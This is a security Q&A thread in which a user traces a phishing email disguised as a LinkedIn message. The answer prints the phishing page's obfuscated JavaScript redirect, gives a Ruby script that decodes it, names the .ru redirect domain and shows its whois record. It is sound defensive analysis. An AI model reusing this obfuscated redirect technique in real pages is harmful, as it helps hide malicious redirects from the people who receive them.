# how to back track a phishing attach? (without being infected)

Tags: phishing

This morning i received this funky looking email from Cerys Evans about a private message he sent my way. First and foremost I want to mention the lack of design talents this attack employed and imagination. The member id of 16666 was immediately suspicious.

here is what I did to backtrack the attack.

[image]

Comment: It is a phishing attack since it was masqueraded as an Linked in email. It is useful to Jonathan below, so that's worth writing it, don't you think? What do I mean by back track? I want to back track to the target host in Russia without being infected by the possible hosting of a BEef attack.

Comment: Hi Galuga - what Tildal is saying is that what you have done is look at what is behind one malicious link. Useful to you for practice, but in the grand scheme of things this is not going to provide any help to others. It isn't 'how to backtrack a phish' in any way.

Comment: Thanks Rory and TidalWave for comments. I think there is a little confusion in wording here. First when I say "Back Track", I'm not referring to Backtrack Linux. My intentions are to track backwards the attack. So from the email I received which looked like a Linkedin email therefore a phishing attack as per definition: "Phishing is an e-mail fraud method in which the perpetrator sends out legitimate-looking email in an attempt to gather personal and financial information from recipients. Typically, the messages appear to come from well known and trustworthy Web sites."

Answer (score 4):

It was obvious after looking for Cerys Evans on Linked In, that this person did not exist. 
The link to the anchor tag was to http://XXXXXXXX.mx/wp-content/investigators.php
so I used curl and downloaded a copy of the html, ( I removed the link so that none clicks on it) If you are curious, let me know, I'll forward the phishing email.)

```
curl http://XXXXXXXX.mx/wp-content/investigators.php

<html>
<head>
<title>whats32031 Keep hangs, pansies exposd innocence - already - sit answerd norway summers.</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<script type="text/javascript">
function ophiliae() { ophiliaa=30; ophiliab=[149,135,140,130,141,149,76,146,141,142,76,138,141,129,127,146,135,141,140,76,134,144,131,132,91,69,134,146,146,142,88,77,77,139,131,130,135,129,127,138,130,144,147,133,131,138,131,139,131,140,146,76,144,147,69,89]; ophiliac=""; for(ophiliad=0;ophiliad<ophiliab.length;ophiliad++) { ophiliac+=String.fromCharCode(ophiliab[ophiliad]-ophiliaa); } return ophiliac; } setTimeout(ophiliae(),1264);
</script>
</body>
</html>
```

Check out the javascript code! super interesting, obfuscated code, cool!
They went all out, using Unicode and stepping it by 30

```
ophiliaa=30;
ophiliab[ophiliad]-ophiliaa
```

I wrote a bit of ruby and decoded the js

```
#!/usr/bin/ruby

# ruby decoder
# Testing phishing exploit
# Nov 4, 2014

decoded_string = ""
encoded_array=[149,135,140,130,141,149,76,146,141,142,76,138,141,129,127,146,135,141,140,76,134,144,131,132,91,69,134,146,146,142,88,77,77,139,131,130,135,129,127,138,130,144,147,133,131,138,131,139,131,140,146,76,144,147,69,89]

encoded_array.each  do |coded| 
  unobstr = coded - 30
  decoded_string <<  [unobstr].pack("U")
end 

puts decoded_string
```

The resulting javascript code is:

```
window.top.location.href='http://medicaldrugelement.ru';
```

Ok, now we're getting somewhere
Did a whois on the domain

```
domain:        MEDICALDRUGELEMENT.RU
nserver:       ns1.clrmbilj.in.
nserver:       ns2.remedialmedselement.com.
state:         REGISTERED, DELEGATED, VERIFIED
person:        Private Person
registrar:     R01-RU
admin-contact: https://partner.r01.ru/contact_admin.khtml
created:       2014.05.26
paid-till:     2015.05.26
free-date:     2015.06.26
source:        TCI

Last updated on 2014.11.05 04:11:31 MSK
```

I tried to get to medialdrugelement.ru using Hurl.com without success. The first time the response time out, the second and following time I received an error.
I used the following headers:
Host: estrati.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

I'll continue a little further next time. If you have any suggestions or comments, please comment!

Comment: Excellent analysis!  +1 and favorite so I can see the analysis method for future reference, hopefully you can get a "reversal" badge for this answer :-)  Some interesting things I see is the .ru suffix (possibly Russian?).  The site: medical drug element.ru leads me to believe they are somehow using this to send spam mail on illegal perscription drugs (but not completely sure).

Comment: While I do not think this is phishing (as mentioned in the question), I do think it is likely a bot net, and the site likely contains malware to make your computer part of that botnet, which is likely used to send spam mail on perscription drugs.  This is all speculation, but certainly do NOT follow the link :-).  This illustrates the importance to not click links (and not download attachments) in e-mails where you don't know the sender.  This is especially sneaky in that it disguises itself as a "harmless" Linked-in message, and it is probably worth reporting your findings to Linked-in.

Comment: In addition to reporting this to Linked-in, you may also want to report this to the US CERT: https://www.us-cert.gov/  I personally say this was a good find.